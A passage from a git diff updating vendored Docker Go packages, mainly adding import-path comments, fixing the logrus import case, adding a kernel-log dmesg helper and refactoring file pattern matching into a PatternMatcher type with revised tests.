```bash -$ docker daemon -H= --cluster-advertise= --cluster-store zk://,/ +$ dockerd -H= --cluster-advertise= --cluster-store zk://,/ ``` diff --git a/vendor/github.com/docker/docker/pkg/discovery/backends.go b/vendor/github.com/docker/docker/pkg/discovery/backends.go index 2eab550e29..1d038285ad 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/backends.go +++ b/vendor/github.com/docker/docker/pkg/discovery/backends.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import ( "fmt" @@ -6,7 +6,7 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) var ( diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery.go b/vendor/github.com/docker/docker/pkg/discovery/discovery.go index ca7f587458..828c5ca488 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/discovery.go +++ b/vendor/github.com/docker/docker/pkg/discovery/discovery.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go index 6084f3ef0d..ffe8cb9122 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/discovery/entry.go b/vendor/github.com/docker/docker/pkg/discovery/entry.go index ce23bbf89b..be06c75787 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/entry.go +++ b/vendor/github.com/docker/docker/pkg/discovery/entry.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import "net" diff --git 
a/vendor/github.com/docker/docker/pkg/discovery/file/file.go b/vendor/github.com/docker/docker/pkg/discovery/file/file.go index 2b8e27b754..1494af485f 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/file/file.go +++ b/vendor/github.com/docker/docker/pkg/discovery/file/file.go @@ -1,4 +1,4 @@ -package file +package file // import "github.com/docker/docker/pkg/discovery/file" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go index 667f00ba0d..010e941c2a 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go @@ -1,4 +1,4 @@ -package file +package file // import "github.com/docker/docker/pkg/discovery/file" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator.go b/vendor/github.com/docker/docker/pkg/discovery/generator.go index d22298298f..788015fe23 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/generator.go +++ b/vendor/github.com/docker/docker/pkg/discovery/generator.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator_test.go b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go index 6281c46665..5126df576e 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/generator_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import ( "github.com/go-check/check" diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go index 77eee7d454..30fe6714c8 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go +++ 
b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go @@ -1,4 +1,4 @@ -package kv +package kv // import "github.com/docker/docker/pkg/discovery/kv" import ( "fmt" @@ -6,7 +6,6 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/discovery" "github.com/docker/go-connections/tlsconfig" "github.com/docker/libkv" @@ -14,6 +13,7 @@ import ( "github.com/docker/libkv/store/consul" "github.com/docker/libkv/store/etcd" "github.com/docker/libkv/store/zookeeper" + "github.com/sirupsen/logrus" ) const ( diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go index dab3939dd0..79fd91c61f 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go @@ -1,4 +1,4 @@ -package kv +package kv // import "github.com/docker/docker/pkg/discovery/kv" import ( "errors" @@ -11,7 +11,6 @@ import ( "github.com/docker/docker/pkg/discovery" "github.com/docker/libkv" "github.com/docker/libkv/store" - "github.com/go-check/check" ) @@ -130,7 +129,6 @@ func (s *Mock) AtomicDelete(key string, previous *store.KVPair) (bool, error) { // Close mock func (s *Mock) Close() { - return } func (ds *DiscoverySuite) TestInitializeWithCerts(c *check.C) { diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go index ba8b1f55f3..81f973e285 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go +++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go @@ -1,4 +1,4 @@ -package memory +package memory // import "github.com/docker/docker/pkg/discovery/memory" import ( "sync" diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go index c2da0a068e..1d937f0160 100644 --- 
a/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go @@ -1,4 +1,4 @@ -package memory +package memory // import "github.com/docker/docker/pkg/discovery/memory" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go index c0e3c07b22..b1d45aa2e6 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go +++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go @@ -1,4 +1,4 @@ -package nodes +package nodes // import "github.com/docker/docker/pkg/discovery/nodes" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go index e26568cf54..f9b43ab00b 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go @@ -1,4 +1,4 @@ -package nodes +package nodes // import "github.com/docker/docker/pkg/discovery/nodes" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go new file mode 100644 index 0000000000..bc71b5b31f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go @@ -0,0 +1,18 @@ +package dmesg // import "github.com/docker/docker/pkg/dmesg" + +import ( + "unsafe" + + "golang.org/x/sys/unix" +) + +// Dmesg returns last messages from the kernel log, up to size bytes +func Dmesg(size int) []byte { + t := uintptr(3) // SYSLOG_ACTION_READ_ALL + b := make([]byte, size) + amt, _, err := unix.Syscall(unix.SYS_SYSLOG, t, uintptr(unsafe.Pointer(&b[0])), uintptr(len(b))) + if err != 0 { + return []byte{} + } + return b[:amt] +} diff --git a/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go 
b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go new file mode 100644 index 0000000000..cc20ff9165 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go @@ -0,0 +1,9 @@ +package dmesg // import "github.com/docker/docker/pkg/dmesg" + +import ( + "testing" +) + +func TestDmesg(t *testing.T) { + t.Logf("dmesg output follows:\n%v", string(Dmesg(512))) +} diff --git a/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go index 7a81cbda95..8b6cb56f17 100644 --- a/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go +++ b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go @@ -1,7 +1,7 @@ // Package filenotify provides a mechanism for watching file(s) for changes. // Generally leans on fsnotify, but provides a poll-based notifier which fsnotify does not support. // These are wrapped up in a common interface so that either can be used interchangeably in your code. -package filenotify +package filenotify // import "github.com/docker/docker/pkg/filenotify" import "github.com/fsnotify/fsnotify" diff --git a/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go index 5d08a997a0..5a737d6530 100644 --- a/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go +++ b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go @@ -1,8 +1,8 @@ -package filenotify +package filenotify // import "github.com/docker/docker/pkg/filenotify" import "github.com/fsnotify/fsnotify" -// fsNotifyWatcher wraps the fsnotify package to satisfy the FileNotifer interface +// fsNotifyWatcher wraps the fsnotify package to satisfy the FileNotifier interface type fsNotifyWatcher struct { *fsnotify.Watcher } diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller.go b/vendor/github.com/docker/docker/pkg/filenotify/poller.go index dc5ccd0f7f..22f1897034 100644 --- 
a/vendor/github.com/docker/docker/pkg/filenotify/poller.go +++ b/vendor/github.com/docker/docker/pkg/filenotify/poller.go @@ -1,4 +1,4 @@ -package filenotify +package filenotify // import "github.com/docker/docker/pkg/filenotify" import ( "errors" @@ -7,7 +7,7 @@ import ( "sync" "time" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" "github.com/fsnotify/fsnotify" ) @@ -15,8 +15,8 @@ import ( var ( // errPollerClosed is returned when the poller is closed errPollerClosed = errors.New("poller is closed") - // errNoSuchPoller is returned when trying to remove a watch that doesn't exist - errNoSuchWatch = errors.New("poller does not exist") + // errNoSuchWatch is returned when trying to remove a watch that doesn't exist + errNoSuchWatch = errors.New("watch does not exist") ) // watchWaitTime is the time to wait between file poll loops @@ -44,7 +44,7 @@ func (w *filePoller) Add(name string) error { w.mu.Lock() defer w.mu.Unlock() - if w.closed == true { + if w.closed { return errPollerClosed } @@ -78,7 +78,7 @@ func (w *filePoller) Remove(name string) error { } func (w *filePoller) remove(name string) error { - if w.closed == true { + if w.closed { return errPollerClosed } diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go index b4c7825112..a46b60d94f 100644 --- a/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go +++ b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go @@ -1,4 +1,4 @@ -package filenotify +package filenotify // import "github.com/docker/docker/pkg/filenotify" import ( "fmt" @@ -61,7 +61,7 @@ func TestPollerEvent(t *testing.T) { default: } - if err := ioutil.WriteFile(f.Name(), []byte("hello"), 644); err != nil { + if err := ioutil.WriteFile(f.Name(), []byte("hello"), 0644); err != nil { t.Fatal(err) } if err := assertEvent(w, fsnotify.Write); err != nil { @@ -108,7 +108,7 @@ func assertEvent(w FileWatcher, eType fsnotify.Op) error { 
select { case e := <-w.Events(): if e.Op != eType { - err = fmt.Errorf("got wrong event type, expected %q: %v", eType, e) + err = fmt.Errorf("got wrong event type, expected %q: %v", eType, e.Op) } case e := <-w.Errors(): err = fmt.Errorf("got unexpected error waiting for events %v: %v", eType, e) diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go index c63ae75ce8..28cad499aa 100644 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go @@ -1,4 +1,4 @@ -package fileutils +package fileutils // import "github.com/docker/docker/pkg/fileutils" import ( "errors" @@ -10,101 +10,77 @@ import ( "strings" "text/scanner" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) -// exclusion returns true if the specified pattern is an exclusion -func exclusion(pattern string) bool { - return pattern[0] == '!' +// PatternMatcher allows checking paths against a list of patterns +type PatternMatcher struct { + patterns []*Pattern + exclusions bool } -// empty returns true if the specified pattern is empty -func empty(pattern string) bool { - return pattern == "" -} - -// CleanPatterns takes a slice of patterns returns a new -// slice of patterns cleaned with filepath.Clean, stripped -// of any empty patterns and lets the caller know whether the -// slice contains any exception patterns (prefixed with !). -func CleanPatterns(patterns []string) ([]string, [][]string, bool, error) { - // Loop over exclusion patterns and: - // 1. Clean them up. - // 2. Indicate whether we are dealing with any exception rules. - // 3. Error if we see a single exclusion marker on its own (!). 
- cleanedPatterns := []string{} - patternDirs := [][]string{} - exceptions := false - for _, pattern := range patterns { +// NewPatternMatcher creates a new matcher object for specific patterns that can +// be used later to match against patterns against paths +func NewPatternMatcher(patterns []string) (*PatternMatcher, error) { + pm := &PatternMatcher{ + patterns: make([]*Pattern, 0, len(patterns)), + } + for _, p := range patterns { // Eliminate leading and trailing whitespace. - pattern = strings.TrimSpace(pattern) - if empty(pattern) { + p = strings.TrimSpace(p) + if p == "" { continue } - if exclusion(pattern) { - if len(pattern) == 1 { - return nil, nil, false, errors.New("Illegal exclusion pattern: !") + p = filepath.Clean(p) + newp := &Pattern{} + if p[0] == '!' { + if len(p) == 1 { + return nil, errors.New("illegal exclusion pattern: \"!\"") } - exceptions = true + newp.exclusion = true + p = p[1:] + pm.exclusions = true } - pattern = filepath.Clean(pattern) - cleanedPatterns = append(cleanedPatterns, pattern) - if exclusion(pattern) { - pattern = pattern[1:] + // Do some syntax checking on the pattern. + // filepath's Match() has some really weird rules that are inconsistent + // so instead of trying to dup their logic, just call Match() for its + // error state and if there is an error in the pattern return it. + // If this becomes an issue we can remove this since its really only + // needed in the error (syntax) case - which isn't really critical. + if _, err := filepath.Match(p, "."); err != nil { + return nil, err } - patternDirs = append(patternDirs, strings.Split(pattern, string(os.PathSeparator))) + newp.cleanedPattern = p + newp.dirs = strings.Split(p, string(os.PathSeparator)) + pm.patterns = append(pm.patterns, newp) } - - return cleanedPatterns, patternDirs, exceptions, nil + return pm, nil } -// Matches returns true if file matches any of the patterns -// and isn't excluded by any of the subsequent patterns. 
-func Matches(file string, patterns []string) (bool, error) { - file = filepath.Clean(file) - - if file == "." { - // Don't let them exclude everything, kind of silly. - return false, nil - } - - patterns, patDirs, _, err := CleanPatterns(patterns) - if err != nil { - return false, err - } - - return OptimizedMatches(file, patterns, patDirs) -} - -// OptimizedMatches is basically the same as fileutils.Matches() but optimized for archive.go. -// It will assume that the inputs have been preprocessed and therefore the function -// doesn't need to do as much error checking and clean-up. This was done to avoid -// repeating these steps on each file being checked during the archive process. -// The more generic fileutils.Matches() can't make these assumptions. -func OptimizedMatches(file string, patterns []string, patDirs [][]string) (bool, error) { +// Matches matches path against all the patterns. Matches is not safe to be +// called concurrently +func (pm *PatternMatcher) Matches(file string) (bool, error) { matched := false file = filepath.FromSlash(file) parentPath := filepath.Dir(file) parentPathDirs := strings.Split(parentPath, string(os.PathSeparator)) - for i, pattern := range patterns { + for _, pattern := range pm.patterns { negative := false - if exclusion(pattern) { + if pattern.exclusion { negative = true - pattern = pattern[1:] } - match, err := regexpMatch(pattern, file) + match, err := pattern.match(file) if err != nil { - return false, fmt.Errorf("Error in pattern (%s): %s", pattern, err) + return false, err } if !match && parentPath != "." { // Check to see if the pattern matches one of our parent dirs. 
- if len(patDirs[i]) <= len(parentPathDirs) { - match, _ = regexpMatch(strings.Join(patDirs[i], string(os.PathSeparator)), - strings.Join(parentPathDirs[:len(patDirs[i])], string(os.PathSeparator))) + if len(pattern.dirs) <= len(parentPathDirs) { + match, _ = pattern.match(strings.Join(parentPathDirs[:len(pattern.dirs)], string(os.PathSeparator))) } } @@ -120,28 +96,49 @@ func OptimizedMatches(file string, patterns []string, patDirs [][]string) (bool, return matched, nil } -// regexpMatch tries to match the logic of filepath.Match but -// does so using regexp logic. We do this so that we can expand the -// wildcard set to include other things, like "**" to mean any number -// of directories. This means that we should be backwards compatible -// with filepath.Match(). We'll end up supporting more stuff, due to -// the fact that we're using regexp, but that's ok - it does no harm. -// -// As per the comment in golangs filepath.Match, on Windows, escaping -// is disabled. Instead, '\\' is treated as path separator. -func regexpMatch(pattern, path string) (bool, error) { - regStr := "^" +// Exclusions returns true if any of the patterns define exclusions +func (pm *PatternMatcher) Exclusions() bool { + return pm.exclusions +} - // Do some syntax checking on the pattern. - // filepath's Match() has some really weird rules that are inconsistent - // so instead of trying to dup their logic, just call Match() for its - // error state and if there is an error in the pattern return it. - // If this becomes an issue we can remove this since its really only - // needed in the error (syntax) case - which isn't really critical. - if _, err := filepath.Match(pattern, path); err != nil { - return false, err +// Patterns returns array of active patterns +func (pm *PatternMatcher) Patterns() []*Pattern { + return pm.patterns +} + +// Pattern defines a single regexp used used to filter file paths. 
+type Pattern struct { + cleanedPattern string + dirs []string + regexp *regexp.Regexp + exclusion bool +} + +func (p *Pattern) String() string { + return p.cleanedPattern +} + +// Exclusion returns true if this pattern defines exclusion +func (p *Pattern) Exclusion() bool { + return p.exclusion +} + +func (p *Pattern) match(path string) (bool, error) { + + if p.regexp == nil { + if err := p.compile(); err != nil { + return false, filepath.ErrBadPattern + } } + b := p.regexp.MatchString(path) + + return b, nil +} + +func (p *Pattern) compile() error { + regStr := "^" + pattern := p.cleanedPattern // Go through the pattern and convert it to a regexp. // We use a scanner so we can support utf-8 chars. var scan scanner.Scanner @@ -161,17 +158,19 @@ func regexpMatch(pattern, path string) (bool, error) { // is some flavor of "**" scan.Next() + // Treat **/ as ** so eat the "/" + if string(scan.Peek()) == sl { + scan.Next() + } + if scan.Peek() == scanner.EOF { // is "**EOF" - to align with .gitignore just accept all regStr += ".*" } else { // is "**" - regStr += "((.*" + escSL + ")|([^" + escSL + "]*))" - } - - // Treat **/ as ** so eat the "/" - if string(scan.Peek()) == sl { - scan.Next() + // Note that this allows for any # of /'s (even 0) because + // the .* will eat everything, even /'s + regStr += "(.*" + escSL + ")?" } } else { // is "*" so map it to anything but "/" @@ -206,14 +205,30 @@ func regexpMatch(pattern, path string) (bool, error) { regStr += "$" - res, err := regexp.MatchString(regStr, path) + re, err := regexp.Compile(regStr) + if err != nil { + return err + } + + p.regexp = re + return nil +} - // Map regexp's error to filepath's so no one knows we're not using filepath +// Matches returns true if file matches any of the patterns +// and isn't excluded by any of the subsequent patterns. 
+func Matches(file string, patterns []string) (bool, error) { + pm, err := NewPatternMatcher(patterns) if err != nil { - err = filepath.ErrBadPattern + return false, err + } + file = filepath.Clean(file) + + if file == "." { + // Don't let them exclude everything, kind of silly. + return false, nil } - return res, err + return pm.Matches(file) } // CopyFile copies from src to dst until either EOF is reached diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go index ccd648fac3..e40cc271b3 100644 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go @@ -1,4 +1,4 @@ -package fileutils +package fileutils // import "github.com/docker/docker/pkg/fileutils" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go deleted file mode 100644 index 0f2cb7ab93..0000000000 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go +++ /dev/null @@ -1,7 +0,0 @@ -package fileutils - -// GetTotalUsedFds Returns the number of used File Descriptors. 
-// On Solaris these limits are per process and not systemwide -func GetTotalUsedFds() int { - return -1 -} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go index 6df1be89bb..4b5f129a50 100644 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go @@ -1,6 +1,7 @@ -package fileutils +package fileutils // import "github.com/docker/docker/pkg/fileutils" import ( + "fmt" "io/ioutil" "os" "path" @@ -8,6 +9,9 @@ import ( "runtime" "strings" "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) // CopyFile with invalid src @@ -208,7 +212,7 @@ func TestReadSymlinkedDirectoryToFile(t *testing.T) { func TestWildcardMatches(t *testing.T) { match, _ := Matches("fileutils.go", []string{"*"}) - if match != true { + if !match { t.Errorf("failed to get a wildcard match, got %v", match) } } @@ -216,7 +220,7 @@ func TestWildcardMatches(t *testing.T) { // A simple pattern match should return true. func TestPatternMatches(t *testing.T) { match, _ := Matches("fileutils.go", []string{"*.go"}) - if match != true { + if !match { t.Errorf("failed to get a match, got %v", match) } } @@ -224,7 +228,7 @@ func TestPatternMatches(t *testing.T) { // An exclusion followed by an inclusion should return true. func TestExclusionPatternMatchesPatternBefore(t *testing.T) { match, _ := Matches("fileutils.go", []string{"!fileutils.go", "*.go"}) - if match != true { + if !match { t.Errorf("failed to get true match on exclusion pattern, got %v", match) } } @@ -232,7 +236,7 @@ func TestExclusionPatternMatchesPatternBefore(t *testing.T) { // A folder pattern followed by an exception should return false. 
func TestPatternMatchesFolderExclusions(t *testing.T) { match, _ := Matches("docs/README.md", []string{"docs", "!docs/README.md"}) - if match != false { + if match { t.Errorf("failed to get a false match on exclusion pattern, got %v", match) } } @@ -240,7 +244,7 @@ func TestPatternMatchesFolderExclusions(t *testing.T) { // A folder pattern followed by an exception should return false. func TestPatternMatchesFolderWithSlashExclusions(t *testing.T) { match, _ := Matches("docs/README.md", []string{"docs/", "!docs/README.md"}) - if match != false { + if match { t.Errorf("failed to get a false match on exclusion pattern, got %v", match) } } @@ -248,7 +252,7 @@ func TestPatternMatchesFolderWithSlashExclusions(t *testing.T) { // A folder pattern followed by an exception should return false. func TestPatternMatchesFolderWildcardExclusions(t *testing.T) { match, _ := Matches("docs/README.md", []string{"docs/*", "!docs/README.md"}) - if match != false { + if match { t.Errorf("failed to get a false match on exclusion pattern, got %v", match) } } @@ -256,7 +260,7 @@ func TestPatternMatchesFolderWildcardExclusions(t *testing.T) { // A pattern followed by an exclusion should return false. func TestExclusionPatternMatchesPatternAfter(t *testing.T) { match, _ := Matches("fileutils.go", []string{"*.go", "!fileutils.go"}) - if match != false { + if match { t.Errorf("failed to get false match on exclusion pattern, got %v", match) } } @@ -264,7 +268,7 @@ func TestExclusionPatternMatchesPatternAfter(t *testing.T) { // A filename evaluating to . should return false. func TestExclusionPatternMatchesWholeDirectory(t *testing.T) { match, _ := Matches(".", []string{"*.go"}) - if match != false { + if match { t.Errorf("failed to get false match on ., got %v", match) } } @@ -277,14 +281,6 @@ func TestSingleExclamationError(t *testing.T) { } } -// A string preceded with a ! should return true from Exclusion. 
-func TestExclusion(t *testing.T) { - exclusion := exclusion("!") - if !exclusion { - t.Errorf("failed to get true for a single !, got %v", exclusion) - } -} - // Matches with no patterns func TestMatchesWithNoPatterns(t *testing.T) { matches, err := Matches("/any/path/there", []string{}) @@ -307,17 +303,14 @@ func TestMatchesWithMalformedPatterns(t *testing.T) { } } -// Test lots of variants of patterns & strings +type matchesTestCase struct { + pattern string + text string + pass bool +} + func TestMatches(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - tests := []struct { - pattern string - text string - pass bool - }{ + tests := []matchesTestCase{ {"**", "file", true}, {"**", "file/", true}, {"**/", "file", true}, // weird one @@ -325,7 +318,7 @@ func TestMatches(t *testing.T) { {"**", "/", true}, {"**/", "/", true}, {"**", "dir/file", true}, - {"**/", "dir/file", false}, + {"**/", "dir/file", true}, {"**", "dir/file/", true}, {"**/", "dir/file/", true}, {"**/**", "dir/file", true}, @@ -335,7 +328,7 @@ func TestMatches(t *testing.T) { {"dir/**", "dir/dir2/file", true}, {"dir/**", "dir/dir2/file/", true}, {"**/dir2/*", "dir/dir2/file", true}, - {"**/dir2/*", "dir/dir2/file/", false}, + {"**/dir2/*", "dir/dir2/file/", true}, {"**/dir2/**", "dir/dir2/dir3/file", true}, {"**/dir2/**", "dir/dir2/dir3/file/", true}, {"**file", "file", true}, @@ -369,9 +362,6 @@ func TestMatches(t *testing.T) { {"abc.def", "abcZdef", false}, {"abc?def", "abcZdef", true}, {"abc?def", "abcdef", false}, - {"a\\*b", "a*b", true}, - {"a\\", "a", false}, - {"a\\", "a\\", false}, {"a\\\\", "a\\", true}, {"**/foo/bar", "foo/bar", true}, {"**/foo/bar", "dir/foo/bar", true}, @@ -379,76 +369,92 @@ func TestMatches(t *testing.T) { {"abc/**", "abc", false}, {"abc/**", "abc/def", true}, {"abc/**", "abc/def/ghi", true}, + {"**/.foo", ".foo", true}, + {"**/.foo", "bar.foo", false}, } - for _, test := range tests { - res, _ 
:= regexpMatch(test.pattern, test.text) - if res != test.pass { - t.Fatalf("Failed: %v - res:%v", test, res) - } + if runtime.GOOS != "windows" { + tests = append(tests, []matchesTestCase{ + {"a\\*b", "a*b", true}, + {"a\\", "a", false}, + {"a\\", "a\\", false}, + }...) } -} -// An empty string should return true from Empty. -func TestEmpty(t *testing.T) { - empty := empty("") - if !empty { - t.Errorf("failed to get true for an empty string, got %v", empty) + for _, test := range tests { + desc := fmt.Sprintf("pattern=%q text=%q", test.pattern, test.text) + pm, err := NewPatternMatcher([]string{test.pattern}) + assert.NilError(t, err, desc) + res, _ := pm.Matches(test.text) + assert.Check(t, is.Equal(test.pass, res), desc) } } func TestCleanPatterns(t *testing.T) { - cleaned, _, _, _ := CleanPatterns([]string{"docs", "config"}) + patterns := []string{"docs", "config"} + pm, err := NewPatternMatcher(patterns) + if err != nil { + t.Fatalf("invalid pattern %v", patterns) + } + cleaned := pm.Patterns() if len(cleaned) != 2 { t.Errorf("expected 2 element slice, got %v", len(cleaned)) } } func TestCleanPatternsStripEmptyPatterns(t *testing.T) { - cleaned, _, _, _ := CleanPatterns([]string{"docs", "config", ""}) + patterns := []string{"docs", "config", ""} + pm, err := NewPatternMatcher(patterns) + if err != nil { + t.Fatalf("invalid pattern %v", patterns) + } + cleaned := pm.Patterns() if len(cleaned) != 2 { t.Errorf("expected 2 element slice, got %v", len(cleaned)) } } func TestCleanPatternsExceptionFlag(t *testing.T) { - _, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md"}) - if !exceptions { - t.Errorf("expected exceptions to be true, got %v", exceptions) + patterns := []string{"docs", "!docs/README.md"} + pm, err := NewPatternMatcher(patterns) + if err != nil { + t.Fatalf("invalid pattern %v", patterns) + } + if !pm.Exclusions() { + t.Errorf("expected exceptions to be true, got %v", pm.Exclusions()) } } func TestCleanPatternsLeadingSpaceTrimmed(t 
*testing.T) { - _, _, exceptions, _ := CleanPatterns([]string{"docs", " !docs/README.md"}) - if !exceptions { - t.Errorf("expected exceptions to be true, got %v", exceptions) + patterns := []string{"docs", " !docs/README.md"} + pm, err := NewPatternMatcher(patterns) + if err != nil { + t.Fatalf("invalid pattern %v", patterns) + } + if !pm.Exclusions() { + t.Errorf("expected exceptions to be true, got %v", pm.Exclusions()) } } func TestCleanPatternsTrailingSpaceTrimmed(t *testing.T) { - _, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md "}) - if !exceptions { - t.Errorf("expected exceptions to be true, got %v", exceptions) + patterns := []string{"docs", "!docs/README.md "} + pm, err := NewPatternMatcher(patterns) + if err != nil { + t.Fatalf("invalid pattern %v", patterns) + } + if !pm.Exclusions() { + t.Errorf("expected exceptions to be true, got %v", pm.Exclusions()) } } func TestCleanPatternsErrorSingleException(t *testing.T) { - _, _, _, err := CleanPatterns([]string{"!"}) + patterns := []string{"!"} + _, err := NewPatternMatcher(patterns) if err == nil { t.Errorf("expected error on single exclamation point, got %v", err) } } -func TestCleanPatternsFolderSplit(t *testing.T) { - _, dirs, _, _ := CleanPatterns([]string{"docs/config/CONFIG.md"}) - if dirs[0][0] != "docs" { - t.Errorf("expected first element in dirs slice to be docs, got %v", dirs[0][1]) - } - if dirs[0][1] != "config" { - t.Errorf("expected first element in dirs slice to be config, got %v", dirs[0][1]) - } -} - func TestCreateIfNotExistsDir(t *testing.T) { tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") if err != nil { @@ -506,7 +512,7 @@ var matchTests = []matchTest{ {"*c", "abc", true, nil}, {"a*", "a", true, nil}, {"a*", "abc", true, nil}, - {"a*", "ab/c", false, nil}, + {"a*", "ab/c", true, nil}, {"a*/b", "abc/b", true, nil}, {"a*/b", "a/c/b", false, nil}, {"a*b*c*d*e*/f", "axbxcxdxe/f", true, nil}, @@ -570,14 +576,14 @@ func TestMatch(t *testing.T) { pattern 
